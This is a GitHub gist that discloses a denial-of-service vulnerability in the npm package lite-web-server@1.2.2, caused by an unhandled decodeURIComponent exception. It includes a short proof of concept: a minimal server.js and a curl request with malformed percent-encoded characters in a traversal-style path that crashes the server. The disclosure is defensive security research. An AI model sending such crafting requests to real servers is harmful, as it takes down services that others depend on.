Skip to content

Instantly share code, notes, and snippets.

@lirantal

lirantal/lite-web-server-denial-of-service.md Secret

Created October 21, 2022 17:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save lirantal/637520812da06fffb91dd86d02ff6bde to your computer and use it in GitHub Desktop.
Save lirantal/637520812da06fffb91dd86d02ff6bde to your computer and use it in GitHub Desktop.
Download ZIP
Denial of Service in lite-web-server@1.2.2
Raw
lite-web-server-denial-of-service.md

Denial of Service vulnerability in lite-web-server@1.2.2

lite-web-server is an HTTP file server, and describes itself as The npm package to create simple web server.

Observation:

  • Virtually zero downloads, so no considerable impact.
  • It was last published 6 months ago, so can assume some level of maintenance exists.

Resources:

Background on exploitation

If an attacker makes an HTTP request to a server running with lite-web-server and includes control characters that the decodeURI() function is unable to parse, then it causes lite-web-server to crash.

The vulnerable code is line 274 of src/WebServer.js which doesn't handle an exception thrown here:

          var _url = decodeURIComponent(req.url).slice(1);

Proof of Concept exploit

  1. Install the package: npm install --save lite-web-server@1.2.2
  2. Create a server.js to serve requests (see below)
  3. Ensure you have a ./public directory in the current project and have a file in there
  4. Send an HTTP request which uses unicode characters outside of the ASCII scope of URLs: curl http://10.100.102.7:3000/..%c0%2fetc%c0%2fhosts
  5. Observe the server crashes

server.js

var { WebServer } = require("lite-web-server");
var server = new WebServer({
  dir: "./public/"
});

server.start();

Author

Liran Tal

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment